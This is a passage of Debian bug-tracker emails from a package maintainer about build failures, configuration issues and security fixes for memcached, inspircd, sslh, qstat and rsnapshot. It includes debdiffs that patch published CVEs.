> 
> Regards,
> Salvatore
> 

-- 
Guillaume Delacour


signature.asc
Description: Digital signature

Bug#842634: Bug#851877: fails every time

2017-05-14 Thread Guillaume Delacour 
Hi,

Le 15/05/2017 à 00:50, Adam Borowski a écrit :

> 
> So it's a fully _reproducible_ bug, with a well-defined immediate cause
> (even if we haven't identified the indirect cause yet) -- unlike the
> original report by Santiago Villa.  Thus, it looks we have two different
> bugs that just happen to trigger the same failure mode.
> 
> And thus, even if we fix the schroot issue, Santiago's bug likely won't be
> fixed.
>  
>> Now, the next question is: where does this /etc/hosts come from? The file
>> is present in the above form directly after unpacking the schroot tarball,
>> before even entering the schroot.
> 
>> Running debootstrap does not produce an /etc/hosts in --variant=minbase and
>> --variant=buildd. When run without --variant, it does produce an
>> /etc/hosts, but that looks correct:
> [snip]
>> So, where does the file get mangled? I can’t find any traces in the schroot
>> and sbuild sources. Does anyone know by chance?
> 
> Even more puzzling: I just recreated the chroot again, and despite using the
> very same command to do so as before (last on 2017-05-04) there's no
> /etc/hosts in the chroot now, which makes sslh build correctly.
> 
> The version from 2017-05-04 includes has an /etc/hosts, with ::1 replaced by
> 127.0.0.1 just as you noticed.  And I see no uploads of debootstrap, sbuild,
> schroot or a package that looks related in that time period.
> 
> Got an unrelated big build running at the moment, once it's done I'll boot
> from a snapshot (got backups from 2017-05-01 (plus earliers) and dailies
> since 2017-05-06) to see if it's a matter of an installed package.
> 
> But again, this is probably unrelated to Santiago's bug other than for the
> results.

As this bug is not related to sslh package itself, i've removed the
pending tag, i let Michael revert
https://anonscm.debian.org/cgit/collab-maint/sslh.git/commit/?id=243bb3faa682afa8168664eaf5a4f72cfc21ee27
and closing this bug to disable the autoremoval in testing.


-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#851877: fails every time

2017-05-09 Thread Guillaume Delacour 
Hi,

On Sat, 6 May 2017 20:57:44 +0200 Adam Borowski <kilob...@angband.pl> wrote:
> On Sat, May 06, 2017 at 08:00:11PM +0200, Michael Stapelberg wrote:
> > Thanks. It seems like getaddrinfo() is returning two results when resolving
> > localhost. Can you provide the contents of your hostname resolution-related
> > configuration please? I.e., /etc/hosts, /etc/resolv.conf,
> > /etc/nsswitch.conf, anything else you might have tweaked in that area.
> 
> nsswitch.conf: always default.
> 
> 
> amd64 (100% fails on all chroots):
> .--[ /etc/hosts ]
> 127.0.0.1 localhost
> 127.0.1.1 umbar.angband.plumbar
> #lots of commented out stuff
> 
> # The following lines are desirable for IPv6 capable hosts
> ::1 localhost ip6-localhost ip6-loopback
> ff02::1 ip6-allnodes
> ff02::2 ip6-allrouters
> +--[ /etc/resolv.conf ]
> domain angband.pl
> search angband.pl
> nameserver 2001:6a0:118::3:2
> `
> 
> armhf (100% fails on all chroots):
> .--[ /etc/hosts ]
> 127.0.0.1 localhost
> ::1   localhost ip6-localhost ip6-loopback
> fe00::0   ip6-localnet
> ff00::0   ip6-mcastprefix
> ff02::1   ip6-allnodes
> ff02::2   ip6-allrouters
> 
> 127.0.0.1  kholdankholdan.angband.pl
> 2001:6a0:118::3:6 narchost
> #2001:6a0:118::3:3apt.angband.pl
> +--[ /etc/resolv.conf ]
> domain angband.pl
> search angband.pl
> nameserver 10.0.1.2
> `
> 
> arm64 (100% ok on all chroots):
> .--[ /etc/hosts ]
> 127.0.0.1 localhost
> 127.0.1.1 sirius.angband.pl sirius
> 
> # The following lines are desirable for IPv6 capable hosts
> ::1 localhost ip6-localhost ip6-loopback
> fe00::0 ip6-localnet
> ff00::0 ip6-mcastprefix
> ff02::1 ip6-allnodes
> ff02::2 ip6-allrouters
> +--[ /etc/resolv.conf ]
> domain angband.pl
> nameserver 10.0.1.2
> nameserver 2001:6a0:118::3:2
> `
> 

I've also spent time to reproduce this and despite my attempt to disable
localhost IPv6 resolution [0], i already encountered issues for echosrv
on ::1.

You can also try to replace any occurrence of `localhost` on t file by
127.0.0.1. If the testsuite cause trouble, i'll disable IPv6 completely
even on loopback (i didn't like the idea at first glance because want to
keep the testsuite as close as upstream ship it).

Then, any other special configurations in /etc/gai.conf ?

[0]:
https://anonscm.debian.org/cgit/collab-maint/sslh.git/tree/debian/patches/ftbfs_localhost.diff

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#856568: memcached: Permission error creating pidfile with systemd

2017-03-21 Thread Guillaume Delacour 
tags 856568 moreinfo
thanks

Hi,

On Thu, Mar 02, 2017 at 04:04:33PM +0100, Teun wrote:
> After adding the option: "-P /var/run/memcached.pid" to '/etc/memcached.conf',
> I get the following error:
> 
> systemd-memcached-wrapper[2577]: Could not open the pid file
> /var/run/memcached.pid.tmp for writing: Permission denied
> 

Is there any reason to have a pid file for a systemd managed service ?
Systemd handle well the crash of the process in case of crash:

# pkill -9 memcached 
# service memcached status
● memcached.service - memcached daemon
   Loaded: loaded (/lib/systemd/system/memcached.service; enabled)
   Active: failed (Result: signal) since Tue 2017-03-21 23:12:47 GMT; 2s ago
  Process: 4204 
ExecStart=/usr/share/memcached/scripts/systemd-memcached-wrapper 
/etc/memcached.conf (code=killed, signal=KILL)
 Main PID: 4204 (code=killed, signal=KILL)

Mar 21 23:11:46 jessie systemd[1]: Started memcached daemon.
Mar 21 23:12:47 jessie systemd[1]: memcached.service: main process exited, 
code=killed, status=9/KILL
Mar 21 23:12:47 jessie systemd[1]: Unit memcached.service entered failed state.

As systemd official doc says [1][2], it is recommended to use PIDFile if the 
service forks and exit at startup. Systemd wrapper script does not exit after 
startup and can run in foreground.


[1]: https://www.freedesktop.org/software/systemd/man/systemd.service.html#Type=
[2]: 
https://www.freedesktop.org/software/systemd/man/systemd.service.html#PIDFile=

-- 
Guillaume Delacour


signature.asc
Description: Digital signature

Bug#853544: memcached: ftbfs with GCC-7

2017-03-21 Thread Guillaume Delacour 
tags 853544 upstream fixed-upstream
thanks


On Tue, 31 Jan 2017 09:33:50 + Matthias Klose <d...@debian.org> wrote:

> items.c:730:45: error: '%d' directive output truncated writing between 10 and 
> 11 bytes into a region of size 8 [-Werror=format-truncation=]
>  snprintf(key, sizeof(key), "%d", i * 32);
>  ^~
> items.c:730:44: note: using the range [-2147483648, 2147483647] for directive 
> argument
>  snprintf(key, sizeof(key), "%d", i * 32);
> ^~~~
> In file included from /usr/include/stdio.h:938:0,
>  from /usr/include/event2/event.h:195,
>  from /usr/include/event.h:71,
>  from memcached.h:16,
>  from items.c:2:
> /usr/include/x86_64-linux-gnu/bits/stdio2.h:64:10: note: format output 
> between 11 and 12 bytes into a destination of size 8
>return __builtin___snprintf_chk (__s, __n, __USE_FORTIFY_LEVEL - 1,
>   ^~~~
> __bos (__s), __fmt, __va_arg_pack ());
> ~
> items.c: In function 'item_stats_sizes':
> items.c:730:45: error: '%d' directive output truncated writing between 10 and 
> 11 bytes into a region of size 8 [-Werror=format-truncation=]
>  snprintf(key, sizeof(key), "%d", i * 32);
>  ^~
> items.c:730:44: note: using the range [-2147483648, 2147483647] for directive 
> argument
>  snprintf(key, sizeof(key), "%d", i * 32);
> ^~~~
> In file included from /usr/include/stdio.h:938:0,
>  from /usr/include/event2/event.h:195,
>  from /usr/include/event.h:71,
>  from memcached.h:16,

All is now fine with release 1.4.36
(https://github.com/memcached/memcached/commit/64bbbf4c7655a540247db4b608b00f809742f24b),
will be released after the freeze in unstable.


-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#842812: memcached: CVE-2016-8705

2016-11-02 Thread Guillaume Delacour 
Fix is the same as #842814.

On Tue, 01 Nov 2016 14:05:19 +0100 Salvatore Bonaccorso
<car...@debian.org> wrote:
> Source: memcached
> Version: 1.4.31-1
> Severity: important
> Tags: security upstream
> 
> Hi,
> 
> the following vulnerability was published for memcached.
> 
> CVE-2016-8705[0]:
> Memcached Server Update Remote Code Execution Vulnerability
> 
> It is reproducible with the (fixed) reproducer on the TALOS site, when
> running under valgrind easily.
> 
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
> 
> For further information see:
> 
> [0] https://security-tracker.debian.org/tracker/CVE-2016-8705
> [1] http://www.talosintelligence.com/reports/TALOS-2016-0220/
> 
> Please adjust the affected versions in the BTS as needed.
> 
> Regards,
> Salvatore
> 
> 

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#842811: memcached: CVE-2016-8704

2016-11-02 Thread Guillaume Delacour 
Fix is the same as for #842814.

On Tue, 01 Nov 2016 14:00:07 +0100 Salvatore Bonaccorso
<car...@debian.org> wrote:
> Source: memcached
> Version: 1.4.31-1
> Severity: important
> Tags: security upstream
> 
> Hi,
> 
> the following vulnerability was published for memcached.
> 
> CVE-2016-8704[0]:
> Memcached Server Append/Prepend Remote Code Execution Vulnerability
> 
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
> 
> For further information see:
> 
> [0] https://security-tracker.debian.org/tracker/CVE-2016-8704
> [1] http://www.talosintelligence.com/reports/TALOS-2016-0219/
> 
> Please adjust the affected versions in the BTS as needed.
> 
> Regards,
> Salvatore
> 
> 

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#842814: memcached: CVE-2016-8706

2016-11-02 Thread Guillaume Delacour 
Please see attached the debdiff.
Also, please note that i can't upload myself to security-master as i'm
not a DD nor DM.

On Tue, 01 Nov 2016 14:08:44 +0100 Salvatore Bonaccorso
<car...@debian.org> wrote:
> Source: memcached
> Version: 1.4.31-1
> Severity: important
> Tags: security upstream
> 
> Hi,
> 
> the following vulnerability was published for memcached.
> 
> CVE-2016-8706[0]:
> |Memcached Server SASL Autentication Remote Code Execution
> |Vulnerability
> 
> It is easily reproducible with the TALOS reproducer when memcached
> enabled SASL authentication and running under valgrind to see the
> crash.
> 
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
> 
> For further information see:
> 
> [0] https://security-tracker.debian.org/tracker/CVE-2016-8706
> [1] http://www.talosintelligence.com/reports/TALOS-2016-0221/
> 
> Please adjust the affected versions in the BTS as needed.
> 
> Regards,
> Salvatore
> 
> 

-- 
Guillaume Delacour
diff -Nru memcached-1.4.21/debian/changelog memcached-1.4.21/debian/changelog
--- memcached-1.4.21/debian/changelog   2015-03-07 13:01:25.0 +
+++ memcached-1.4.21/debian/changelog   2016-11-03 02:14:20.0 +
@@ -1,3 +1,12 @@
+memcached (1.4.21-1.1+deb8u1) jessie-security; urgency=high
+
+  * CVE-2016-8704: Fix Append/Prepend Remote Code Execution (Closes: #842811)
+  * CVE-2016-8705: Fix Update Remote Code Execution (Closes: #842812)
+  * CVE-2016-8706: Fix SASL Authentication Remote Code Execution
+(Closes: #842814)
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Thu, 03 Nov 2016 02:26:55 +0100
+
 memcached (1.4.21-1.1) unstable; urgency=medium
 
   * Non-maintainer upload.
diff -Nru memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch 
memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch
--- memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch
1970-01-01 00:00:00.0 +
+++ memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch
2016-11-03 01:31:47.0 +
@@ -0,0 +1,50 @@
+From bd578fc34b96abe0f8d99c1409814a09f51ee71c Mon Sep 17 00:00:00 2001
+From: dormando <dorma...@rydia.net>
+Date: Wed, 12 Oct 2016 13:50:47 -0700
+Subject: [PATCH] CVE reported by cisco talos
+Origin: upstream,
+https://github.com/memcached/memcached/commit/bd578fc34b96abe0f8d99c1409814a09f51ee71c
+Last-Update: 2016-11-03
+
+---
+ items.c |  3 +++
+ memcached.c | 10 --
+ 2 files changed, 11 insertions(+), 2 deletions(-)
+
+diff --git a/items.c b/items.c
+index 9e6d921..a1cca4a 100644
+--- a/items.c
 b/items.c
+@@ -148,6 +148,9 @@ item *do_item_alloc(char *key, const size_t nkey, const 
unsigned int flags,
+ uint8_t nsuffix;
+ item *it = NULL;
+ char suffix[40];
++if (nbytes < 2 || nkey < 0)
++return 0;
++
+ size_t ntotal = item_make_header(nkey + 1, flags, nbytes, suffix, 
);
+ if (settings.use_cas) {
+ ntotal += sizeof(uint64_t);
+diff --git a/memcached.c b/memcached.c
+index dc1f636..ad423a0 100644
+--- a/memcached.c
 b/memcached.c
+@@ -1997,10 +1997,16 @@ static bool authenticated(conn *c) {
+ static void dispatch_bin_command(conn *c) {
+ int protocol_error = 0;
+ 
+-int extlen = c->binary_header.request.extlen;
+-int keylen = c->binary_header.request.keylen;
++uint8_t extlen = c->binary_header.request.extlen;
++uint16_t keylen = c->binary_header.request.keylen;
+ uint32_t bodylen = c->binary_header.request.bodylen;
+ 
++if (keylen > bodylen || keylen + extlen > bodylen) {
++write_bin_error(c, PROTOCOL_BINARY_RESPONSE_UNKNOWN_COMMAND, NULL, 0);
++c->write_and_go = conn_closing;
++return;
++}
++
+ if (settings.sasl && !authenticated(c)) {
+ write_bin_error(c, PROTOCOL_BINARY_RESPONSE_AUTH_ERROR, NULL, 0);
+ c->write_and_go = conn_closing;
diff -Nru memcached-1.4.21/debian/patches/series 
memcached-1.4.21/debian/patches/series
--- memcached-1.4.21/debian/patches/series  2015-03-07 13:01:25.0 
+
+++ memcached-1.4.21/debian/patches/series  2016-11-03 01:32:38.0 
+
@@ -4,3 +4,4 @@
 04_add_init_retry.patch
 06_eol_comment_handling.patch
 07_disable_tests.patch
+08_CVE-2016-8704_8705_8706.patch


signature.asc
Description: OpenPGP digital signature

Bug#836706: certificate spoofing via crafted SASL messages

2016-09-06 Thread Guillaume Delacour 

Please see attached the debdiff.
Also, please note that i can't upload myself to security-master as i'm
not a DD nor DM.

Le 06/09/2016 à 00:02, Guillaume Delacour a écrit :
> 
> 
> Le 05/09/2016 à 22:41, James Lu a écrit :
>> Hi,
> 
> Hi,
> 
>>
>> Just to narrow things down a bit, the relevant fix for InspIRCd 2.0 is
>> this commit
>> https://github.com/inspircd/inspircd/commit/74fafb7f11b06747f69f182ad5e3769b665eea7a
> 
> Yes, i've talked to upstream a few hours ago to include this particular
> fix to 2.0.17; upload of 2.0.23 will follow to unstable.
> 
>>
>> Best,
>> James
>>
> 

-- 
Guillaume Delacour


diff -Nru inspircd-2.0.17/debian/changelog inspircd-2.0.17/debian/changelog
--- inspircd-2.0.17/debian/changelog2016-03-22 19:31:22.0 +0100
+++ inspircd-2.0.17/debian/changelog2016-09-06 21:29:13.0 +0200
@@ -1,3 +1,10 @@
+inspircd (2.0.17-1+deb8u2) jessie-security; urgency=high
+
+  * m_sasl: don't allow AUTHENTICATE with mechanisms with a space
+(CVE-2016-7142)
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Tue, 06 Sep 2016 01:58:19 +0200
+
 inspircd (2.0.17-1+deb8u1) jessie-security; urgency=high
 
   * Non-maintainer upload by the Wheezy LTS Team. 
diff -Nru inspircd-2.0.17/debian/patches/CVE-2016-7142.patch 
inspircd-2.0.17/debian/patches/CVE-2016-7142.patch
--- inspircd-2.0.17/debian/patches/CVE-2016-7142.patch  1970-01-01 
01:00:00.0 +0100
+++ inspircd-2.0.17/debian/patches/CVE-2016-7142.patch  2016-09-06 
21:29:13.0 +0200
@@ -0,0 +1,31 @@
+From 74fafb7f11b06747f69f182ad5e3769b665eea7a Mon Sep 17 00:00:00 2001
+From: Adam <a...@anope.org>
+Date: Fri, 2 Sep 2016 22:57:03 -0400
+Subject: [PATCH] m_sasl: don't allow AUTHENTICATE with mechanisms with a space
+
+---
+ src/modules/m_sasl.cpp | 4 
+ 1 file changed, 4 insertions(+)
+
+diff --git a/src/modules/m_sasl.cpp b/src/modules/m_sasl.cpp
+index 9cb5592..16a1535 100644
+--- a/src/modules/m_sasl.cpp
 b/src/modules/m_sasl.cpp
+@@ -189,6 +189,7 @@ class CommandAuthenticate : public Command
+   : Command(Creator, "AUTHENTICATE", 1), authExt(ext), cap(Cap)
+   {
+   works_before_reg = true;
++  allow_empty_last_param = false;
+   }
+ 
+   CmdResult Handle (const std::vector& parameters, User 
*user)
+@@ -199,6 +200,9 @@ class CommandAuthenticate : public Command
+   if (!cap.ext.get(user))
+   return CMD_FAILURE;
+ 
++  if (parameters[0].find(' ') != std::string::npos || 
parameters[0][0] == ':')
++  return CMD_FAILURE;
++
+   SaslAuthenticator *sasl = authExt.get(user);
+   if (!sasl)
+   authExt.set(user, new SaslAuthenticator(user, 
parameters[0]));
diff -Nru inspircd-2.0.17/debian/patches/series 
inspircd-2.0.17/debian/patches/series
--- inspircd-2.0.17/debian/patches/series   2016-03-22 19:29:23.0 
+0100
+++ inspircd-2.0.17/debian/patches/series   2016-09-06 22:55:05.0 
+0200
@@ -2,3 +2,4 @@
 01_dpkg-buildflags_support.diff
 03_gnutls_crypt_api_instead_gcrypt.diff
 CVE-2015-8702.patch
+CVE-2016-7142.patch


signature.asc
Description: OpenPGP digital signature

Bug#836706: certificate spoofing via crafted SASL messages

2016-09-05 Thread Guillaume Delacour 


Le 05/09/2016 à 22:41, James Lu a écrit :
> Hi,

Hi,

> 
> Just to narrow things down a bit, the relevant fix for InspIRCd 2.0 is
> this commit
> https://github.com/inspircd/inspircd/commit/74fafb7f11b06747f69f182ad5e3769b665eea7a

Yes, i've talked to upstream a few hours ago to include this particular
fix to 2.0.17; upload of 2.0.23 will follow to unstable.

> 
> Best,
> James
> 

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#790275: qstat: FTBFS with glibc 2.21 and gcc-5

2016-02-08 Thread Guillaume Delacour 
On Sat, 31 Oct 2015 15:15:33 +0100 Guillaume Delacour <g...@iroqwa.org>
wrote:
> 
> Upstream seems to have modified qstat.c to include strndup() only if
> needed in recent version of qstat :
> 
> https://github.com/multiplay/qstat/commit/9977e09cebc340208ab097f8db619ebc80756859

I've uploaded a fix on mentors:
http://mentors.debian.net/debian/pool/main/q/qstat/qstat_2.15-2.dsc.

I'm waiting for Jordi for uploading it in the archive.

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#809008: inspircd: FTBFS: rmdir: failed to remove '[..]/debian/inspircd/usr/lib/inspircd/data': No such file or directory

2015-12-28 Thread Guillaume Delacour 
retitle 809008 "FTBFS with perl 5.22: Calling POSIX::tmpnam() is deprecated"
thanks

Le 26/12/2015 04:26, Chris Lamb a écrit :
> Source: inspircd
> Version: 2.0.20-4
> Severity: serious
> Justification: fails to build from source
> User: reproducible-bui...@lists.alioth.debian.org
> Usertags: ftbfs
> X-Debbugs-Cc: reproducible-bui...@lists.alioth.debian.org
> 
> Dear Maintainer,
> 
> inspircd fails to build from source in unstable/amd64:
> 
>   [..]
>   # delete empty data and log dir
>   rmdir 
> /home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/data
>  \
>   
> /home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/logs
>   rmdir: failed to remove 
> '/home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/data':
>  No such file or directory
>   rmdir: failed to remove 
> '/home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/logs':
>  No such file or directory
>   debian/rules:51: recipe for target 'override_dh_auto_install' failed
>   make[1]: *** [override_dh_auto_install] Error 1
>   make[1]: Leaving directory 
> '/home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20'
>   debian/rules:81: recipe for target 'binary' failed
>   make: *** [binary] Error 2
> 
>   [..]
> 
> The full build log is attached.

The real problem is:

[...]
Evaluating perl code for module m_pgsql.cpp ...

Configuration failed. The following error occured:

Calling POSIX::tmpnam() is deprecated at make/utilities.pm line 407,
 line 32.
[...]

Upstream use POSIX::tmpnam in this file which seems (i don't find any
other pointer than [1]) to be deprecated since perl 5.22; i 'll propose
them to use File::Temp instead and prepare a new -4 version.

[1]:
https://metacpan.org/pod/distribution/perl/ext/POSIX/lib/POSIX.pod#FUNCTIONS

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#784357: memcached multi instance startup/shutdown broken

2015-12-28 Thread Guillaume Delacour 
tags 784357 +help

Hi,

On Wed, 16 Dec 2015 14:26:38 -0500 Jonathan Champ <roya...@gmail.com> wrote:
> Ran into this again today. Hope there's been some progress?

Not for the moment, i'm sorry that the only way i can propose for now is
to create one unit systemd file per instance needed.

I'll try to find a solution in the middle of January.

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#804010: New version 1.0.1 available

2015-11-04 Thread Guillaume Delacour 
On Wed, Nov 04, 2015 at 09:16:04AM +0100, Sebastien Bacher wrote:
> Package: gdisk
> Version: 1.0.0-3
> 
> There is a new 1.0.1 version available that fixes some EFI issues and
> potential segfaults on some architectures, it would be nice to have that
> update in Debian

Sure, i've prepared this package a few days ago on mentors:

http://mentors.debian.net/debian/pool/main/g/gdisk/gdisk_1.0.1-1.dsc

My main sponsor doesn't reply me yet, you can review the package and upload it
if you have some time. Thanks in advance.

-- 
Guillaume Delacour


signature.asc
Description: Digital signature

Bug#789860: php5-imagick: Segmentation fault when accessing an unknown property

2015-10-31 Thread Guillaume Delacour 
fixed 789860 3.2.0~rc1-1
thanks

Hi,

It is seems to be unreproducible in versions:
- 3.2.0~rc1-1 (stable)
- 3.3.0~rc2-1 (testing/unstable)

Le 24/06/2015 23:37, Jerry a écrit :
> Package: php5-imagick
> Version: 3.1.0~rc1-1+b2
> Severity: normal
> 
> The following code produces a segmentation fault:
> 
>  $im = new \Imagick;
> $im->foo;
> ?>
> 
> It can also be reproduces on the command line:
> 
> jerry@box:~$ php -r '$im = new \Imagick(); $im->foo;'
> Segmentation fault
> 
> -- System Information:
> Debian Release: 7.8
>   APT prefers oldstable-updates
>   APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
> Architecture: i386 (i686)
> 
> Kernel: Linux 2.6.32-30-pve (SMP w/2 CPU cores)
> Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/dash
> 
> Versions of packages php5-imagick depends on:
> ii  libc6   2.13-38+deb7u8
> ii  libmagickcore5  8:6.7.7.10-5+deb7u3
> ii  libmagickwand5  8:6.7.7.10-5+deb7u3
> ii  php5-cli [phpapi-20100525+lfs]  5.4.41-0+deb7u1
> ii  php5-common 5.4.41-0+deb7u1
> ii  php5-fpm [phpapi-20100525+lfs]  5.4.41-0+deb7u1
> ii  ucf 3.0025+nmu3
> 
> Versions of packages php5-imagick recommends:
> ii  ghostscript  9.05~dfsg-6.3+deb7u1
> ii  ttf-dejavu-core  2.33-3
> 
> php5-imagick suggests no packages.
> 
> -- no debconf information
> 

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#790275: qstat: FTBFS with glibc 2.21 and gcc-5

2015-10-31 Thread Guillaume Delacour 
tag 790275 fixed-upstream
thanks

On Sat, 27 Jun 2015 13:08:22 -0700 Daniel Schepler <dschep...@gmail.com>
wrote:
> Source: qstat
> Version: 2.15-1
> Severity: normal
> 
> From my pbuilder build log, using a setup preferring glibc and gcc-defaults
> from experimental:
> 
> ...
> gcc -DHAVE_CONFIG_H -I.   -Dsysconfdir=\"/etc\" -D_FORTIFY_SOURCE=2 -DDEBUG 
> -DENABLE_DUMP  -g -O2 -fstack-protector-strong -Wformat 
> -Werror=format-security -Wall -c -o md5.o md5.c
> gcc -DHAVE_CONFIG_H -I.   -Dsysconfdir=\"/etc\" -D_FORTIFY_SOURCE=2 -DDEBUG 
> -DENABLE_DUMP  -g -O2 -fstack-protector-strong -Wformat 
> -Werror=format-security -Wall -c -o qserver.o qserver.c
> gcc -DHAVE_CONFIG_H -I.   -Dsysconfdir=\"/etc\" -D_FORTIFY_SOURCE=2 -DDEBUG 
> -DENABLE_DUMP  -g -O2 -fstack-protector-strong -Wformat 
> -Werror=format-security -Wall -c -o qstat.o qstat.c
> In file included from /usr/include/string.h:634:0,
>  from qstat.c:31:
> qstat.c:2633:7: error: expected identifier or '(' before '__extension__'
>  char *strndup(const char *string, size_t len);
>^
> qstat.c: In function 'do_work':
> qstat.c:3104:18: warning: variable 'fd' set but not used 
> [-Wunused-but-set-variable]
>   int pktlen, rc, fd;
>   ^
> qstat.c: In function 'deal_with_ghostrecon_packet':
> qstat.c:9789:26: warning: variable 'end' set but not used 
> [-Wunused-but-set-variable]
>   char str[256], *start, *end, StartFlag, *lpszIgnoreServerPlayer;
>   ^
> qstat.c:9789:18: warning: variable 'start' set but not used 
> [-Wunused-but-set-variable]
>   char str[256], *start, *end, StartFlag, *lpszIgnoreServerPlayer;
>   ^
> In file included from /usr/include/string.h:634:0,
>  from qstat.c:31:
> qstat.c: At top level:
> qstat.c:12121:7: error: expected identifier or '(' before '__extension__'
>  char *strndup(const char *string, size_t len)

Upstream seems to have modified qstat.c to include strndup() only if
needed in recent version of qstat :

https://github.com/multiplay/qstat/commit/9977e09cebc340208ab097f8db619ebc80756859


>^
> Makefile:543: recipe for target 'qstat.o' failed
> make[3]: *** [qstat.o] Error 1
> make[3]: Leaving directory '/tmp/buildd/qstat-2.15'
> Makefile:580: recipe for target 'all-recursive' failed
> make[2]: *** [all-recursive] Error 1
> make[2]: Leaving directory '/tmp/buildd/qstat-2.15'
> Makefile:397: recipe for target 'all' failed
> make[1]: *** [all] Error 2
> make[1]: Leaving directory '/tmp/buildd/qstat-2.15'
> dh_auto_build: make -j1 returned exit code 2
> debian/rules:4: recipe for target 'build' failed
> make: *** [build] Error 2
> dpkg-buildpackage: error: debian/rules build gave error exit status 2
> E: Failed autobuilding of package
> -- 
> Daniel Schepler
> 
> 

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#800650: Create development header packages

2015-10-31 Thread Guillaume Delacour 


Le 02/10/2015 08:09, Michael D a écrit :
> Package: inspircd
> Severity: |wishlist|
> 
> Hi All,
> 
> I was wondering if there was any interest in creating an inspircd-dev
> package that simply copies over the include/ folder to
> /usr/include/inspircd/ ?

This can be useful if there is some other (external ?) extensions that
need to be compiled for inspircd.

I have enabled most (if not all) extensions provided as modules [1], do
you have example of external module ?


[1]: http://sources.debian.net/src/inspircd/2.0.20-3/debian/rules/#L19-L24

> Should be simple enough, I can include a patch if really needed.
> 

-- 
Guillaume Delacour



signature.asc
Description: OpenPGP digital signature

Bug#784915: jessie-pu: package rsnapshot/1.3.1-4

2015-10-25 Thread Guillaume Delacour 
Hi,

Le 21/08/2015 16:34, Adam D. Barratt a écrit :

> 
> The package in unstable and testing appears to have been fixed now.
> 
>> In either case, when it comes to an update in stable we'll need a source
>> debdiff of the proposed updated package, built and tested in a Jessie
>> environment, rather than pointers to online patches.
> 
> This is still true, however.

Please find attached a debdiff that fix the problem in Jessie. I've
tested the fix by defining ssh_args in /etc/rsnapshot.conf and it's
works well after the fix (before applying the update rsnapshot fails
with "rsync: Failed to exec /usr/bin/ssh -p222: No such file or directory").

> 
> Regards,
> 
> Adam
> 

-- 
Guillaume Delacour
diff -Nru rsnapshot-1.3.1/debian/changelog rsnapshot-1.3.1/debian/changelog
--- rsnapshot-1.3.1/debian/changelog2013-07-08 22:54:57.0 +0200
+++ rsnapshot-1.3.1/debian/changelog2015-10-25 23:39:03.0 +0100
@@ -1,3 +1,13 @@
+rsnapshot (1.3.1-4+deb8u1) jessie; urgency=medium
+
+  * debian/patches/14_fix_rsh_args: fix regression on --rsh with args:
+Applied patch from Upstream to fix --rsh command line arguments with 
quotes.
+The --rsh=... argument to rsync was erroneously quoted when added to the
+@rsync_long_args_stack with options set. Thanks Jonas Genannt for the
+help.
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Sun, 25 Oct 2015 23:33:28 +0100
+
 rsnapshot (1.3.1-4) unstable; urgency=low
 
   * debian/patches/01_rsnapshot_conf: Refresh patch to fix path of rsnapshot in
diff -Nru rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff 
rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff
--- rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff 1970-01-01 
01:00:00.0 +0100
+++ rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff 2015-10-25 
23:38:18.0 +0100
@@ -0,0 +1,18 @@
+From: Edwin Mons <g...@home.mons.net>
+Date: Wed, 18 Sep 2013 22:39:11 +0200
+Subject: Fix rsync --rsh command line arguments with quotes
+Bug: 
https://github.com/rsnapshot/rsnapshot/commit/30380587aeab201311af9428f7c47621ade691c8
+
+diff --git a/rsnapshot-program.pl b/rsnapshot-program.pl
+index 85972fd..5a20d0b 100755
+--- a/rsnapshot-program.pl
 b/rsnapshot-program.pl
+@@ -3412,7 +3412,7 @@ sub rsync_backup_point {
+   
+   # if we have any args for SSH, add them
+   if ( defined($ssh_args) ) {
+-  push( @rsync_long_args_stack, 
"--rsh=\"$config_vars{'cmd_ssh'} $ssh_args\"" );
++  push( @rsync_long_args_stack, 
"--rsh=$config_vars{'cmd_ssh'} $ssh_args" );
+   
+   # no arguments is the default
+   } else {
diff -Nru rsnapshot-1.3.1/debian/patches/series 
rsnapshot-1.3.1/debian/patches/series
--- rsnapshot-1.3.1/debian/patches/series   2013-07-08 22:27:41.0 
+0200
+++ rsnapshot-1.3.1/debian/patches/series   2015-10-25 23:33:09.0 
+0100
@@ -8,3 +8,4 @@
 11_lvm_snapshots.diff
 12_include_conf_with_arguments.diff
 13_print_warn.diff
+14_fix_rsh_args.diff


signature.asc
Description: OpenPGP digital signature

